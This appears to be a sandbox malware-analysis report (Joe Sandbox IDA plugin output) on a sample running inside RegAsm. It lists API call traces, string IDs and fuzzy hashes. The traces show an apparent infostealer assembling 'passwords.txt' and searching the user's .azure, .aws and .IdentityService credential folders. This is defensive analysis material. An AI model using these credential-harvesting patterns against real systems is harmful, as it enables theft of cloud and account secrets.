                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prolog$strchr
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2055753264-0
                                                                                                                                                                                                                                                              • Opcode ID: 0362cd235d03f128da0e166cdddf9ad3111f92cf4bce827dcdf02c963a387dd1
                                                                                                                                                                                                                                                              • Instruction ID: c05d7502ecd2eacdcf272a4942f4d7feb1ffdb60bb1a06669d9f5fdcf2215b79
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0362cd235d03f128da0e166cdddf9ad3111f92cf4bce827dcdf02c963a387dd1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21E10172C00219ABCF01AFE1ED499AFBB7ABF08305F04582AF911B3151DB395615DBA6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00408362
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00408462
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040846A
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408476
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00408480
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408491
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040849D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004084A4
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?), ref: 004084B6
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(-00000010), ref: 004084D0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 004084E4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004084F6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D64), ref: 00408504
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00408516
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D68), ref: 00408524
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 00408533
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,-00000010), ref: 0040853D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D6C), ref: 0040854B
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE), ref: 0040855B
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000014), ref: 0040856B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0040857F
                                                                                                                                                                                                                                                                • Part of subcall function 0040825F: memset.MSVCRT ref: 00408286
                                                                                                                                                                                                                                                                • Part of subcall function 0040825F: lstrlen.KERNEL32(0040858B,00000001,?,00000014,00000000,00000000,?,0040858B,00000014), ref: 004082A0
                                                                                                                                                                                                                                                                • Part of subcall function 0040825F: CryptStringToBinaryA.CRYPT32(0040858B,00000000,?,0040858B,00000014), ref: 004082AA
                                                                                                                                                                                                                                                                • Part of subcall function 0040825F: memcpy.MSVCRT ref: 00408312
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00408590
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D70), ref: 0040859E
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE), ref: 004085AE
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000014), ref: 004085BE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 004085D2
                                                                                                                                                                                                                                                                • Part of subcall function 0040825F: lstrcat.KERNEL32(00423BB7,00423BBB), ref: 00408339
                                                                                                                                                                                                                                                                • Part of subcall function 0040825F: lstrcat.KERNEL32(00423BB7,00423BBE), ref: 00408351
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004085E3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D74), ref: 004085F1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423D78), ref: 004085FF
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE), ref: 0040860F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00408625
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408678
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408681
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Filelstrcpy$H_prologlstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
                                                                                                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                                                                                                              • API String ID: 2199717062-347816968
                                                                                                                                                                                                                                                              • Opcode ID: ba8819ed37eec71e66bc769f1423cf4fe2ea174bfdb646640f444bb92cd5fd13
                                                                                                                                                                                                                                                              • Instruction ID: d18807dec5b2fcf3952a6fd5a802b184d55c75befddb125860330b6468982be3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba8819ed37eec71e66bc769f1423cf4fe2ea174bfdb646640f444bb92cd5fd13
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3A18D72801109EFCB01EBA1ED49AEE7F7AFF18314F14182EF511B21A1DB391A15DBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • NtQueryInformationProcess, xrefs: 00416073
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                              • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                                                              • Opcode ID: e8990a85bf392c883529f3acdb73d591fb891e8f987fcc599ecf97d09dc357f3
                                                                                                                                                                                                                                                              • Instruction ID: 103555bb0f45b27d9f1b78275277d91a90b856d1509b2306d02bc0e97eb74878
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8990a85bf392c883529f3acdb73d591fb891e8f987fcc599ecf97d09dc357f3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7871EB75511600EFDB169FA0FE099293FB7FB48B21B14712AF905D2270EB364862EF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$YHI;$_node
                                                                                                                                                                                                                                                              • API String ID: 0-287120110
                                                                                                                                                                                                                                                              • Opcode ID: b840d1bc6dfbaccaf3a735cd0c026524429bf8e85c68ab3cd0a819cf7a47e21c
                                                                                                                                                                                                                                                              • Instruction ID: c02c4310cd8f3e7766ec3883cc5b8b48112cfcf39390544003732b59f6961a60
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b840d1bc6dfbaccaf3a735cd0c026524429bf8e85c68ab3cd0a819cf7a47e21c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F1DD755003419FD7119F39C890A5AB7ECFF44704F8C442DEDAA87242D736E99ACBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
                                                                                                                                                                                                                                                              • API String ID: 0-1613945299
                                                                                                                                                                                                                                                              • Opcode ID: 02d34d61ce7b02459986d29f1b8a66466ebb76164ffb1de185e772414b37e567
                                                                                                                                                                                                                                                              • Instruction ID: a6128d4e92d91e55d821d33b4377fa13108a8380158d8978c7daed18b0af0372
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02d34d61ce7b02459986d29f1b8a66466ebb76164ffb1de185e772414b37e567
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F10475A08359ABD300CF68CC45F5BB3EABF95700F9C8A1DF98497241E635F9488752
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                                                                                                                                                                                                                              • API String ID: 0-1242591684
                                                                                                                                                                                                                                                              • Opcode ID: 7ee28c8ce020acee1e3585275b2b8db62aecb49383dd0e37f3e704bf617be638
                                                                                                                                                                                                                                                              • Instruction ID: 8bdf7a16a142ad0809851929d15a28fd105bb194c898c3a40e2efc406bee3155
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ee28c8ce020acee1e3585275b2b8db62aecb49383dd0e37f3e704bf617be638
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09C1DDB5500341AFD7108F3CCC84B9677B8FF50709F09956CE85A87292DB36E95ACBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                                                                                                              • API String ID: 0-900822179
                                                                                                                                                                                                                                                              • Opcode ID: 7024c8258dc06ce1db16c56dafc8ba90bc25f8352f5ff37da2ee40a0fbb75fc5
                                                                                                                                                                                                                                                              • Instruction ID: 1f4ad4dfc48363f1f8f5dc94452ba6f697ed7f8e076665ee13f6af51696ed5f5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7024c8258dc06ce1db16c56dafc8ba90bc25f8352f5ff37da2ee40a0fbb75fc5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED9119755083059BCB09CF14C844B6B77EABF81704F9C884DFA958B252DB36E94ACBB1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                              • API String ID: 0-449611708
                                                                                                                                                                                                                                                              • Opcode ID: 173b1c943449c7cd4eb3418c9b9f20c4cd00ccaff898dd4a6c1f62153e9738a2
                                                                                                                                                                                                                                                              • Instruction ID: b52d49632edefbaae2dd7243f28535d3e9a611f2388e7eb0c233db16da82db0d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 173b1c943449c7cd4eb3418c9b9f20c4cd00ccaff898dd4a6c1f62153e9738a2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D514E70A4431167E310AE789D85F9736AC6F50B1AF8C413CFD08A6282E769F75EC2D2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004150E1
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415101
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00415127
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,\.azure\), ref: 00415144
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: _EH_prolog.MSVCRT ref: 00414CCC
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414CEB
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: FindFirstFileA.KERNEL32(?,?), ref: 00414D02
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,00424818), ref: 00414D1F
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042481C), ref: 00414D39
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D5D
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042447E), ref: 00414D6E
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D8B
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: PathMatchSpecA.SHLWAPI(?,?), ref: 00414DB2
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414DDE
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424834), ref: 00414DF0
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E00
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424838), ref: 00414E12
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E26
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041517F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004151AA
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,\.aws\), ref: 004151C7
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D9F
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: FindNextFileA.KERNEL32(00000000,?), ref: 00414EF6
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: FindClose.KERNEL32(00000000), ref: 00414F05
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415202
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041522D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0041524A
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415285
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
